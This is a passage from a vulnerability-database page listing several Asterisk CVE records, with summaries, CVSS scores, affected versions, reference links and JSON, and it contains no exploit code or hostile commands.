      "url": "http://downloads.asterisk.org/pub/security/AST-2011-008.diff"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2011-008.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-July/062628.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/45048"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/45201"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/45239"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://securitytracker.com/id?1025706"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.debian.org/security/2011/dsa-2276"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.osvdb.org/73307"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/48431"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/68203"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2011-008.diff"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2011-008.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-July/062628.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/45048"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/45201"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/45239"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://securitytracker.com/id?1025706"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.debian.org/security/2011/dsa-2276"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.osvdb.org/73307"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/48431"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/68203"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-119"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2021-02-18 20:15

Modified

2024-11-21 05:28

Severity ?

6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Summary

A buffer overflow in res_pjsip_diversion.c in Sangoma Asterisk versions 13.38.1, 16.15.1, 17.9.1, and 18.1.1 allows remote attacker to crash Asterisk by deliberately misusing SIP 181 responses.

References

URL	Tags
cve@mitre.org	http://packetstormsecurity.com/files/161470/Asterisk-Project-Security-Advisory-AST-2021-001.html	Patch, Third Party Advisory
cve@mitre.org	http://seclists.org/fulldisclosure/2021/Feb/57	Mailing List, Third Party Advisory
cve@mitre.org	https://downloads.asterisk.org/pub/security/AST-2021-001.html	Vendor Advisory
cve@mitre.org	https://issues.asterisk.org/	Issue Tracking, Vendor Advisory
cve@mitre.org	https://issues.asterisk.org/jira/browse/ASTERISK-29227	Exploit, Issue Tracking, Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/161470/Asterisk-Project-Security-Advisory-AST-2021-001.html	Patch, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://seclists.org/fulldisclosure/2021/Feb/57	Mailing List, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://downloads.asterisk.org/pub/security/AST-2021-001.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/	Issue Tracking, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/jira/browse/ASTERISK-29227	Exploit, Issue Tracking, Patch, Vendor Advisory

Impacted products

Vendor	Product	Version
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "1E99E69F-264A-4AD2-B507-02486117FA1C",
              "versionEndIncluding": "13.38.1",
              "versionStartIncluding": "13.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "A0F7194B-B22A-4A28-98D2-5565442D8EF9",
              "versionEndIncluding": "16.15.1",
              "versionStartIncluding": "16.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "1B6714BD-DBC8-4F8D-A7C9-C8A93FE7A73C",
              "versionEndIncluding": "17.9.1",
              "versionStartIncluding": "17.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "A8DFA54E-1555-4438-AAD3-DE033F33147F",
              "versionEndIncluding": "18.1.1",
              "versionStartIncluding": "18.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A buffer overflow in res_pjsip_diversion.c in Sangoma Asterisk versions 13.38.1, 16.15.1, 17.9.1, and 18.1.1 allows remote attacker to crash Asterisk by deliberately misusing SIP 181 responses."
    },
    {
      "lang": "es",
      "value": "Un desbordamiento del b\u00fafer en el archivo res_pjsip_diversion.c en Sangoma Asterisk versiones 13.38.1, 16.15.1, 17.9.1 y 18.1.1, permite a un atacante remoto bloquear Asterisk al hacer un uso inapropiado deliberadamente de las respuestas SIP 181"
    }
  ],
  "id": "CVE-2020-35776",
  "lastModified": "2024-11-21T05:28:03.670",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 4.3,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-02-18T20:15:12.447",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Third Party Advisory"
      ],
      "url": "http://packetstormsecurity.com/files/161470/Asterisk-Project-Security-Advisory-AST-2021-001.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "http://seclists.org/fulldisclosure/2021/Feb/57"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/AST-2021-001.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Issue Tracking",
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Issue Tracking",
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29227"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Third Party Advisory"
      ],
      "url": "http://packetstormsecurity.com/files/161470/Asterisk-Project-Security-Advisory-AST-2021-001.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "http://seclists.org/fulldisclosure/2021/Feb/57"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/AST-2021-001.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Issue Tracking",
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Issue Tracking",
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29227"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-120"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2014-11-24 15:59

Modified

2024-11-21 02:19

Severity ?

Summary

ConfBridge in Asterisk 11.x before 11.14.1, 12.x before 12.7.1, and 13.x before 13.0.1 and Certified Asterisk 11.6 before 11.6-cert8 allows remote authenticated users to (1) gain privileges via vectors related to an external protocol to the CONFBRIDGE dialplan function or (2) execute arbitrary system commands via a crafted ConfbridgeStartRecord AMI action.

References

▼	URL	Tags
	cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2014-017.html	Vendor Advisory
	af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2014-017.html	Vendor Advisory

Impacted products

Vendor	Product	Version
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "8CDFB271-72DA-4E23-87A0-E50EE633843F",
              "versionEndExcluding": "11.14.1",
              "versionStartIncluding": "11.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "F21F0B73-A30F-4673-B3A8-D9F456FFCEF2",
              "versionEndExcluding": "12.7.1",
              "versionStartIncluding": "12.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "0C83CD93-7CBA-4FF0-B29E-A509F4A3D5E2",
              "versionEndExcluding": "13.0.1",
              "versionStartIncluding": "13.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "322694EF-B086-4BE7-A9F0-41D3A9C245FF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "013B1940-C45D-4FE2-8B49-D92B8F1A9048",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "A98B11B5-B8E2-4903-B4F7-3AC23751AE8F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "C7D60B24-C509-49C3-87A9-49D05CB44183",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert5:*:*:*:*:*:*",
              "matchCriteriaId": "3C1F9978-44E7-4D39-BEC6-5C6DB7F893E9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert6:*:*:*:*:*:*",
              "matchCriteriaId": "69BA61A8-2A95-4800-BB4E-692BA4321A84",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert7:*:*:*:*:*:*",
              "matchCriteriaId": "C481D8B0-622D-491D-B292-717B0369B507",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "CCDDF5C2-9B45-4811-90F6-984EF4B220CF",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "ConfBridge in Asterisk 11.x before 11.14.1, 12.x before 12.7.1, and 13.x before 13.0.1 and Certified Asterisk 11.6 before 11.6-cert8 allows remote authenticated users to (1) gain privileges via vectors related to an external protocol to the CONFBRIDGE dialplan function or (2) execute arbitrary system commands via a crafted ConfbridgeStartRecord AMI action."
    },
    {
      "lang": "es",
      "value": "ConfBridge en Asterisk 11.x anterior a 11.14.1, 12.x anterior a 12.7.1, y 13.x anterior a 13.0.1 y Certified Asterisk 11.6 anterior a 11.6-cert8 permite a usuarios remotos autenticados (1) ganar privilegios a trav\u00e9s de vectores relacionados con un protocolo externo en la funci\u00f3n CONFBRIDGE dialplan o (2) ejecutar comandos del sistema arbitrarios a trav\u00e9s de una acci\u00f3n ConfbridgeStartRecord AMI manipulada."
    }
  ],
  "id": "CVE-2014-8417",
  "lastModified": "2024-11-21T02:19:02.703",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 6.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2014-11-24T15:59:09.343",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-017.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-017.html"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-264"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2007-07-31 10:17

Modified

2024-11-21 00:34

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

The IAX2 channel driver (chan_iax2) in Asterisk Open 1.2.x before 1.2.23, 1.4.x before 1.4.9, and Asterisk Appliance Developer Kit before 0.6.0, when configured to allow unauthenticated calls, allows remote attackers to cause a denial of service (resource exhaustion) via a flood of calls that do not complete a 3-way handshake, which causes an ast_channel to be allocated but not released.

References

URL	Tags
cve@mitre.org	http://bugs.gentoo.org/show_bug.cgi?id=185713	Issue Tracking, Patch
cve@mitre.org	http://ftp.digium.com/pub/asa/ASA-2007-018.pdf	Broken Link, Patch
cve@mitre.org	http://osvdb.org/38197	Broken Link
cve@mitre.org	http://secunia.com/advisories/26274	Broken Link, Patch, Vendor Advisory
cve@mitre.org	http://secunia.com/advisories/29051	Broken Link
cve@mitre.org	http://security.gentoo.org/glsa/glsa-200802-11.xml	Third Party Advisory
cve@mitre.org	http://securityreason.com/securityalert/2960	Broken Link
cve@mitre.org	http://www.securityfocus.com/archive/1/475069/100/0/threaded	Broken Link, Third Party Advisory, VDB Entry
cve@mitre.org	http://www.securityfocus.com/bid/24950	Broken Link, Third Party Advisory, VDB Entry
cve@mitre.org	http://www.securitytracker.com/id?1018472	Broken Link, Third Party Advisory, VDB Entry
cve@mitre.org	http://www.vupen.com/english/advisories/2007/2701	Broken Link
af854a3a-2127-422b-91ae-364da2661108	http://bugs.gentoo.org/show_bug.cgi?id=185713	Issue Tracking, Patch
af854a3a-2127-422b-91ae-364da2661108	http://ftp.digium.com/pub/asa/ASA-2007-018.pdf	Broken Link, Patch
af854a3a-2127-422b-91ae-364da2661108	http://osvdb.org/38197	Broken Link
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/26274	Broken Link, Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/29051	Broken Link
af854a3a-2127-422b-91ae-364da2661108	http://security.gentoo.org/glsa/glsa-200802-11.xml	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://securityreason.com/securityalert/2960	Broken Link
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/archive/1/475069/100/0/threaded	Broken Link, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/24950	Broken Link, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://www.securitytracker.com/id?1018472	Broken Link, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://www.vupen.com/english/advisories/2007/2701	Broken Link

Impacted products

Vendor	Product	Version
digium	asterisk	*
digium	asterisk	*
digium	asterisk_appliance_developer_kit	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "550ACDD4-83E9-470C-A151-51DC311B9C65",
              "versionEndExcluding": "1.2.23",
              "versionStartIncluding": "1.2.20",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "7D5AE015-73F0-450E-AAC4-D60BEE3E71A6",
              "versionEndExcluding": "1.4.9",
              "versionStartIncluding": "1.4.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk_appliance_developer_kit:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "1EB3B452-3577-44C9-AD6C-14982AD5E4A2",
              "versionEndExcluding": "0.6.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "The IAX2 channel driver (chan_iax2) in Asterisk Open 1.2.x before 1.2.23, 1.4.x before 1.4.9, and Asterisk Appliance Developer Kit before 0.6.0, when configured to allow unauthenticated calls, allows remote attackers to cause a denial of service (resource exhaustion) via a flood of calls that do not complete a 3-way handshake, which causes an ast_channel to be allocated but not released."
    },
    {
      "lang": "es",
      "value": "El controlador de canal IAX2 (chan_iax2) de Asterisk Open 1.2.x anterior a 1.2.23, 1.4.x anterior a 1.4.9, y Asterisk Appliance Developer Kit anterior a 0.6.0, cuando est\u00e1 configurado para permitir llamadas no autenticadas, permite a atacantes remotos provocar una denegaci\u00f3n de servicio (agotamiento de recursos) mediante una inundaci\u00f3n de llamadas que no completan la negociaci\u00f3n de 3 pasos, lo cual provoca que se reserve un canal ast_channel pero no se libere."
    }
  ],
  "id": "CVE-2007-4103",
  "lastModified": "2024-11-21T00:34:47.433",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 7.8,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2007-07-31T10:17:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Issue Tracking",
        "Patch"
      ],
      "url": "http://bugs.gentoo.org/show_bug.cgi?id=185713"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Broken Link",
        "Patch"
      ],
      "url": "http://ftp.digium.com/pub/asa/ASA-2007-018.pdf"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Broken Link"
      ],
      "url": "http://osvdb.org/38197"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Broken Link",
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/26274"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Broken Link"
      ],
      "url": "http://secunia.com/advisories/29051"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://security.gentoo.org/glsa/glsa-200802-11.xml"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Broken Link"
      ],
      "url": "http://securityreason.com/securityalert/2960"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Broken Link",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/archive/1/475069/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Broken Link",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/24950"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Broken Link",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securitytracker.com/id?1018472"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Broken Link"
      ],
      "url": "http://www.vupen.com/english/advisories/2007/2701"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Issue Tracking",
        "Patch"
      ],
      "url": "http://bugs.gentoo.org/show_bug.cgi?id=185713"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Broken Link",
        "Patch"
      ],
      "url": "http://ftp.digium.com/pub/asa/ASA-2007-018.pdf"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Broken Link"
      ],
      "url": "http://osvdb.org/38197"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Broken Link",
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/26274"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Broken Link"
      ],
      "url": "http://secunia.com/advisories/29051"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://security.gentoo.org/glsa/glsa-200802-11.xml"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Broken Link"
      ],
      "url": "http://securityreason.com/securityalert/2960"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Broken Link",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/archive/1/475069/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Broken Link",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/24950"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Broken Link",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securitytracker.com/id?1018472"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Broken Link"
      ],
      "url": "http://www.vupen.com/english/advisories/2007/2701"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-772"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2011-07-06 19:55

Modified

2024-11-21 01:28

Severity ?

Summary

chan_sip.c in the SIP channel driver in Asterisk Open Source 1.4.x before 1.4.41.2, 1.6.2.x before 1.6.2.18.2, and 1.8.x before 1.8.4.4, and Asterisk Business Edition C.3.x before C.3.7.3, disregards the alwaysauthreject option and generates different responses for invalid SIP requests depending on whether the user account exists, which allows remote attackers to enumerate account names via a series of requests.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2011-011-1.8.diff	Patch
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2011-011.html	Vendor Advisory
cve@mitre.org	http://www.securitytracker.com/id?1025734
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2011-011-1.8.diff	Patch
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2011-011.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.securitytracker.com/id?1025734

Impacted products

Vendor	Product	Version
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.1
digium	asterisk	1.8.1
digium	asterisk	1.8.1.1
digium	asterisk	1.8.1.2
digium	asterisk	1.8.2
digium	asterisk	1.8.2.1
digium	asterisk	1.8.2.2
digium	asterisk	1.8.2.3
digium	asterisk	1.8.2.4
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3.1
digium	asterisk	1.8.3.2
digium	asterisk	1.8.3.3
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4.1
digium	asterisk	1.8.4.2
digium	asterisk	1.8.4.3
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.1
digium	asterisk	1.6.2.1
digium	asterisk	1.6.2.2
digium	asterisk	1.6.2.3
digium	asterisk	1.6.2.4
digium	asterisk	1.6.2.5
digium	asterisk	1.6.2.6
digium	asterisk	1.6.2.6
digium	asterisk	1.6.2.6
digium	asterisk	1.6.2.15
digium	asterisk	1.6.2.16
digium	asterisk	1.6.2.16
digium	asterisk	1.6.2.16.1
digium	asterisk	1.6.2.16.2
digium	asterisk	1.6.2.17
digium	asterisk	1.6.2.17
digium	asterisk	1.6.2.17
digium	asterisk	1.6.2.17
digium	asterisk	1.6.2.17.1
digium	asterisk	1.6.2.17.2
digium	asterisk	1.6.2.17.3
digium	asterisk	1.6.2.18
digium	asterisk	1.6.2.18
digium	asterisk	1.6.2.18.1
digium	asterisk	1.4.0
digium	asterisk	1.4.0
digium	asterisk	1.4.0
digium	asterisk	1.4.0
digium	asterisk	1.4.0
digium	asterisk	1.4.1
digium	asterisk	1.4.2
digium	asterisk	1.4.3
digium	asterisk	1.4.4
digium	asterisk	1.4.5
digium	asterisk	1.4.6
digium	asterisk	1.4.7
digium	asterisk	1.4.7.1
digium	asterisk	1.4.8
digium	asterisk	1.4.9
digium	asterisk	1.4.10
digium	asterisk	1.4.10.1
digium	asterisk	1.4.11
digium	asterisk	1.4.12
digium	asterisk	1.4.12.1
digium	asterisk	1.4.13
digium	asterisk	1.4.14
digium	asterisk	1.4.15
digium	asterisk	1.4.16
digium	asterisk	1.4.16.1
digium	asterisk	1.4.16.2
